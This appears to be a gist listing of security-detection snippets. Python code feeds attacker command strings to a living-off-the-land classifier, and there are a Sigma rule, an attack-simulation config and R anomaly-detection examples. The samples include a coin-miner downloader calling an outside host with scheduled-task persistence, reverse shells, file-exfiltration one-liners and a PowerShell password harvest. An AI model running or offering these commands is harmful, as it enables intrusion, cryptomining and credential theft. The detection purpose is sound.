This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# LOLBINS coin miner commands from https://lolbas-project.github.io/ | |
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute | |
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute | |
# References: | |
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf | |
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/ | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois | |
# https://gtfobins.github.io/#+file%20upload | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT', | |
'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST', | |
'whois -h $RHOST -p $RPORT base64 $LFILE'] | |
classification, tags = lolc(commands) | |
for command, status, tag in zip (commands, classification, tags): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from GTFOBins: reverse shell examples via nc, gimp, and bash | |
# https://gtfobins.github.io/#+reverse%20shellc | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['nc -e /bin/sh $RHOST $RPORT', | |
'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()', | |
'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'] | |
classification, tags = lolc(commands) | |
for command, status, tag in zip (commands, classification, tags): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"title": "NOBELLIUM FoggyWeb File Drop Sysmon", | |
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.", | |
"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)", | |
"tags": [ | |
"attack.persistence", | |
"attack.defense_evasion" | |
], | |
"level": "critical", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<sim> | |
<delete>false</delete> | |
<errordirectory>C:\Users\Public\Documents\</errordirectory> | |
<task> | |
<config> | |
<name>PowerShell_test</name> | |
<loop>3</loop> | |
<pause>1000</pause> | |
</config> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
security_access_logs %>% | |
filter(server == "SERVER549521") %>% | |
ungroup() %>% | |
time_decompose(count) %>% | |
anomalize(remainder) %>% | |
plot_anomaly_decomposition() + | |
labs(title = "Decomposition of Anomalized SERVER-549521 Downloads") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
SERVER549521 %>% | |
# STL + IQR Anomaly Detection | |
time_decompose(count, method = "stl", trend = "4 months") %>% | |
anomalize(remainder, method = "iqr") %>% | |
time_recompose() %>% | |
# Anomaly Visualization | |
plot_anomalies(time_recomposed = TRUE) + | |
labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# Get only SERVER549521 access | |
SERVER549521 <- security_access_logs %>% | |
filter(server == "SERVER-549521") %>% | |
ungroup() | |
# Anomalize!! | |
SERVER549521 %>% | |
# Twitter + GESD | |
time_decompose(count, method = "twitter", trend = "4 months") %>% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
security_access_logs %>% | |
# Data Manipulation / Anomaly Detection | |
time_decompose(count, method = "stl") %>% | |
anomalize(remainder, method = "iqr") %>% | |
time_recompose() %>% | |
# Anomaly Visualization | |
plot_anomalies(time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) + | |
labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods") |
NewerOlder